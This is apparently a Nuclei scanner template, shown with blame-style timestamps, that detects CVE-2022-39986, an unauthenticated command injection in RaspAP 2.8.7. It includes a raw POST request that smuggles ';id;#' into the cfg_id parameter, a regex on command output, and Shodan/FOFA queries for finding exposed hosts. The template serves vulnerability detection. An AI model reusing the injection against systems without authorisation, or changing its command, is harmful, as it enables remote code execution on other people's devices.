2023-08-18 10:31:22 +00:00
id : CVE-2022-39986
info :
name : RaspAP 2.8.7 - Unauthenticated Command Injection
author : DhiyaneshDK
severity : critical
description : |
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
2023-08-18 10:31:22 +00:00
reference :
- https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39986
- https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
2023-08-18 10:31:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-39986
cwe-id : CWE-77
2024-03-23 09:28:19 +00:00
epss-score : 0.87977
epss-percentile : 0.98588
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
2023-08-18 10:31:22 +00:00
metadata :
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : raspap
product : raspap
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:-1465760059
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=-1465760059
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,packetstorm,raspap,rce
2023-08-18 10:31:22 +00:00
http :
- raw :
- |
POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
cfg_id=;id;#
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a0048304602210099aa294bb03eed7043659c0199250e623d100e601d57357d3553dc6fd561d7e1022100bad06d4676647348c828a779719ab60d9b7cfd97baa3c3c4d1903c935eb92c78:922c64590222798bb761d5b6d8e72950